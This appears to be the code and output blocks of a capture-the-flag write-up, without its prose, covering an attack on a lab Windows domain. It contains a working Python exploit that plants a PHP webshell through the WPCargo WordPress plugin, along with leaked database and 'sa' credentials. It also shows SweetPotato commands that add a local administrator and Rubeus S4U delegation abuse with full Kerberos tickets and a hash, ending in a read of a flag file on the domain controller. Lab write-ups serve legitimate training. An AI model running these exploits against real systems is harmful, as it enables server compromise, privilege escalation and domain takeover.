[+] Requests Done: 177
373
[+] Cached Requests: 5
374
[+] Data Sent: 44.034 KB
375
[+] Data Received: 275.101 KB
376
[+] Memory used: 253.801 MB
377
[+] Elapsed time: 00:00:4

1
import sys
2
import binascii
3
import requests
4

5
# This is a magic string that when treated as pixels and compressed using the png
6
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
7
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
8

9
def encode_character_code(c: int):
10
    return '{:08b}'.format(c).replace('0', 'x')
11

12
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
13

14
destination_url = 'http://127.0.0.1:8001/'
15
cmd = 'ls'
16

17
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
18
requests.get(
19
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
20
)
21

22
# We have uploaded a webshell - now let's use it to execute a command.
23
print(requests.post(
24
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
25
).content.decode('ascii', 'ignore'))

1
proxychains4 python3 WPCargo.py -t http://172.22.2.18/

1
// ** Database settings - You can get this info from your web host ** //
2
/** The name of the database for WordPress */
3
define( 'DB_NAME', 'wordpress' );
4

5
/** Database username */
6
define( 'DB_USER', 'wpuser' );
7

8
/** Database password */
9
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );
10

11
/** Database hostname */
12
define( 'DB_HOST', '127.0.0.1' );
13

14
/** Database charset to use in creating database tables. */
15
define( 'DB_CHARSET', 'utf8mb4' );
16

17
/** The database collate type. Don't change this if in doubt. */
18
define( 'DB_COLLATE', '' );

1
sa: ElGNkOiC

1
C:/Users/Public/SweetPotato.exe -a "netstat -ano"
2

3

4
C:/Users/Public/SweetPotato.exe -a "net user bx bx123456@ /add"
5
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators bx /add"

1
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket: 9f b9 58 a6 fa c0 41 ad 65 f0 90 ef e0 fb 09 de 45 dc 0c d1 b8 d2 42 4c df 48 f0 b6 f0 db d6 05 48 bb a1 e5 8e 29 f7 30 69 64 b7 9a ef da 31 32 3a db ec 43 f2 a9 4d 59 99 24 bf 2c 34 fd 97 f2 b1 98 07 40 af 7a b2 58 a9 13 11 92 27 75 83 d2 15 0c e7 a7 23 14 be 06 8c 42 10 2b 42 96 7e 28 7c b9 be 7a ee 43 e8 e7 e7 80 d9 8f fb 26 3b 05 07 fd 44 d0 d0 e6 49 f5 7f e5 1b 83 ab 29 a9 7a 19 34 e7 43 7d b7 19 28 47 4b 52 f0 4a 0d df c0 40 6e f7 52 ef 25 d3 d3 24 80 b9 37 1a df 45 59 a9 2f a7 7c 4e 88 5e b4 f1 df cf 37 17 a7 ba 83 54 fc e7 2d 88 1a 01 82 6e a0 3d cf 3f 09 77 31 2a 51 7b 3c f1 90 4a 17 4c ba 7e 6b 5e d4 40 5e 70 9f cd a9 ed c0 30 2c d9 3f 48 4a 25 97 43 f4 88 93 18 24 07 10 44 75 36 d5 c8 b0 db 27 03 7b
2

3
c8085de564eb895e033a912bda21adfd
4

5
Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:c8085de564eb895e033a912bda21adfd /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

1
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE14OZexNiH84UPYzK3l/RBuQHnwD3SNsV5Bk+RBHV+k2U8MBOU5fkbxSDZEQsuU36SzpjHCeJt8bMBmaBsw/tg68qD46YRBbFDEZg/w+Zxpf8zBc3fj0JKLQYVFEJcM284fp4Z+UPhTr9+GysJeiVAey63ym4XwePbqprP+bPAogzX6DMP+0m8kyiGiQ05Q5fRDTSlf6m9+THlbvTGwHxhclCDVWVgn0f4AtQIySel5DXJgH1TVKWkRVm9l4lUR5YJO1sTQBK0a6rLTr7pMHt8VYOZ/TinUNlBEvdgKwgexMD1Il472KqYFEWzZRm71fTXfUjRjF+EnuQ5d7f8e8VnH8vaRONgrI1/DoZ9rgbdybepPl2NZo/sosMgDkN6dg1NA1v+LdhNUxv/CPuJwZQLWhGLmrAT0xAckfHI5SgWvf7QDp0oEr/lvLJOLdhrrLuNdnb5tKW13Eqsa90fDm5NfuC+Fkp1Gl0xMvjlR7Lkm959N/W/osOtzLWrpREM3r0U8eOxg9uJZ8HUQPwHYVwRzGzPJLK1avesHbTotEYbh9mJ/Uv5lUrd/AT+UKknFXZhNG+bGxVgztHa62V+jX3tKNsXaj7kaGxE384cd5NUwVyJ4/sSKHUJfkhSZevBaX4KKlUtgUHWA51pR5avKHPuya+MKRJ5XYRzF0W49zHtOst49GvCgmnUyA5sUmCAqbQxZ/aiBPPgK+iBtm65gq4rEYcjw0tlxQ6Lne7krocbXeooS1xGZKFbBpDNOqvuAWtffHO6gsFJ6RoxlxM4KTszfyfJT0TCM2BbCDeiuZDQ/NRl81RDbxc/j6OGvrwJZeDcBULnzPwcmuwi6isAK8Ih8iiw02NlDgYxIetqVBdQiyS28QdeO0fW+egdSDy91YRGhDZng/BJtlACnXmoA/oOmH0i49nSPw5BSTsH5ObpMLoxBI3E2tfChCereefEjdV+wsRfahFxLPbqatFk4APQZStKU9BO5vzhqWtMbEaQutYxXpfAvFKsSCwzmBiJ1vgzyjCvBxPFY2HzfeKrQOWctIhaF1maEdKOk16hFqkN7dMzZm7lqODH52mpuIYRLP5ljGTKmzDUD6w4Iz4qi9UiNDPJeQg3ANVF6OoxRZT845Vl7A0yHUax6mGdnBg+kbkU75YWbKvnOZtvsSZIRVor+TkIWGVAoF3lPnOD+O8E6T79S/1G9iTQh1zg4wOJAku2TXRtOpRJ4pf/OkxO88qqHOngWJHq8Rd271S5BCSZ8mscKHGnhIVqPwDm0+y8NPewKer7iT45Yr6RYzhUHD4oPdQbE1hUvB6Cd31kU2QZ6XBbOsP+gbBfQQBkI2bhkb8qWTdATwFbbkJaUDZP5mPmJYCSFqA+i423AM0HyABmeovrIl97TnI3Qivdmj7dBvxQLJz8vx2HQEuN6K2LIixHgOWF4yxM4XjRRdIgZe37GdtQfwLKZmDqyitGZqJWjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBA4125kZTXjYeyjL1TxBjQroQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDczMTA2NTUwOFqmERgPMjAyNTA3MzExNjU1MDhapxEYDzIwMjUwODA3MDY1NTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

1
   ______        _
2
  (_____ \      | |
3
   _____) )_   _| |__  _____ _   _  ___
4
  |  __  /| | | |  _ \| ___ | | | |/___)
5
  | |  \ \| |_| | |_) ) ____| |_| |___ |
6
  |_|   |_|____/|____/|_____)____/(___/
7

8
  v2.3.3
9

10
[*] Action: S4U
11

12
[*] Action: S4U
13

14
[*] Building S4U2self request for: 'MSSQLSERVER$@XIAORANG.LAB'
15
[*] Using domain controller: DC.xiaorang.lab (172.22.2.3)
16
[*] Sending S4U2self request to 172.22.2.3:88
17
[+] S4U2self success!
18
[*] Got a TGS for 'Administrator' to 'MSSQLSERVER$@XIAORANG.LAB'
19
[*] base64(ticket.kirbi):
20

21
      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
46
      VkVSJA==
47

48
[*] Impersonating user 'Administrator' to target SPN 'CIFS/DC.xiaorang.lab'
49
[*] Building S4U2proxy request for service: 'CIFS/DC.xiaorang.lab'
50
[*] Using domain controller: DC.xiaorang.lab (172.22.2.3)
51
[*] Sending S4U2proxy request to domain controller 172.22.2.3:88
52
[+] S4U2proxy success!
53
[*] base64(ticket.kirbi) for SPN 'CIFS/DC.xiaorang.lab':
54

55
      doIGhjCCBoKgAwIBBaEDAgEWooIFlTCCBZFhggWNMIIFiaADAgEFoQ4bDFhJQU9SQU5HLkxBQqIiMCCg
56
      AwIBAqEZMBcbBENJRlMbD0RDLnhpYW9yYW5nLmxhYqOCBUwwggVIoAMCARKhAwIBBKKCBToEggU25Krd
57
      p7ThNkBBbWy85RneVzJAmH2DWkvy7w/icZVaPsiFKlwTts7Leu4vipGJnjwmhDuwVrVcPO/zoE9suUSc
58
      +KIXWSMYTKDYdDbfdmJFWAbi1mGNG1TnrZpLR+foXXTvATtVFqT+1VwEfEr+XBDqUM2kAuDzsv4UkKXS
59
      ACJXSAwkph8gJgIOWhiC/ObbgKdz4eUrb9KivVIPPxErYTr5DXrv7uFybpCVctVd6ocbm+kwiPrjG9SQ
60
      A1HcsriJtUb63EvGi9IGZS5IPF2se/bL2KnqfBfnJ1xHk2Ph/V/ZhnRXj5R9dNd22Q7/M123uPwaRiCW
61
      imInTVf5vFQYZWWQ9L6twXu/4GzTB5iqobCZoN5HX+lR/3CAO/NjzaOa+bpOnzZFfFKdvjsd+MBd7E9G
62
      HAOlAJvfOx2bE6E88zhhQi9CrVMCii6v69CM7MrxZUGucVbY6p50r85jNZdIn3h+/hGRbwbLbpeZFS7s
63
      FJFLTJgHbbDDZc7niH27O4JRTA2a3bY1F5zSoSY6BnH6ieg1KI1HtNNnqmf1/MKVyRGTcGw/Xb3+UXS5
64
      1eOU7VV9kyzDNdOz7LTQ3Fxeb01y6O5pIeMmC99D6zkXeDWebBHpXsk/o8u8xl8AgnG2zZR5F6XngeTZ
65
      nLeHjUmxusgcqSPkXQY6ETD7rVd7BWex2MBeVUUj6ksvgDqBt2nJ+6oSRKqEk43405maOG5sCa2JmOuy
66
      jroTCxtkOSXDnA8RUCYtPMlXCe97reSUbwGlV0mD9zqtda9ps16OnUpgtjjHi6rHVPCcZwuZYeUorJ2p
67
      gVEOIS733qBuGotfYrpgOiAqSOS7izg1V3aJIJIsak73n6VSWNXt37FHZT9QwTGjbJpAV5oeEHfaFpgH
68
      E7u75YGIrGUtzvJ4xy8BdNv6rD+UxQ58/4guZy0fnRGbt7+rfvBr0HBtoiyAraWkia1sIp7PBN0OeJ6Y
69
      yyRacAb7AHW+YkxaYa0+Es0f+ozqnsWqzV1IM8mmGJcO6T0y9pBnt+OYZPBUoglSsi7czPJPsd5WVINq
70
      9cOZrtY6z5wx+mrwtDwhLl7rrtzjpfA/oItnJ6AaPugMjs0qHLi5NStANLprYEhFA2G8EMGPHBxZ74VD
71
      DiF3neIh66H4/B83SbdsuLtPXRPHMvOwXjs7JqzZp3XBP2XgAg+Gm7rHSUova684P4vjsEab21VrK3cY
72
      s03Asb9ACWX4ZFlhOjIIyc/oejwZElRsbVAWd/jjjuHfLsZrUTJBr6DvTPHPXOEKZdjYfWXmc0aGIAzz
73
      e4nEpUnOgZXRlvDhn21DCCVvPufL4GhuZyrBkp7X1nzkuvYOq6yu/NZXv42I+tPUyirdxVrL8Tm5HS/4
74
      mDImttlqY68ZszJv4MbQEHE+K8zVTh6i6czQ7bHNiQD82c8JSL00QqKmzZh7R4Ci5cInkfSNEwdsIQp/
75
      Nvda+qg0y+wep345wRmxkYHXpzsPx5zGcHIqwcUBilQ5ps4wVptzbbmrTMjlSDoKUF4OOtccJbTmpHa6
76
      GdcvXmOA4i0pixJJDkVyqNRYrcxFU1TbqRb2OCGUgHL/wcjR765RJ667KHAGuZS3LUtOqXfRO8MI4hVC
77
      HcHn3uqJFj575Yhp32l0fyqvnKzycIFnEGUgZdkVtQ+2W/9baBSBczSoNvq7ti6DzSfH+C4DmuQjCiYd
78
      dKnnUyEV/N7fcPwaFdDRJRucuC5fmC+xEF/RVAZw+etrgl7alTKfVPxx6VaTYvFHTUqnfd1DqFYtfSFi
79
      XDrDc8k5l50d9HqjgdwwgdmgAwIBAKKB0QSBzn2ByzCByKCBxTCBwjCBv6AbMBmgAwIBEaESBBA8GkBe
80
      ipS5n7tpNNdauCD4oQ4bDFhJQU9SQU5HLkxBQqIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3KjBwMF
81
      AEClAAClERgPMjAyNTA3MzEwNjU2MjBaphEYDzIwMjUwNzMxMTY1NTA4WqcRGA8yMDI1MDgwNzA2NTUw
82
      OFqoDhsMWElBT1JBTkcuTEFCqSIwIKADAgECoRkwFxsEQ0lGUxsPREMueGlhb3JhbmcubGFi
83
[+] Ticket successfully imported!

1
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt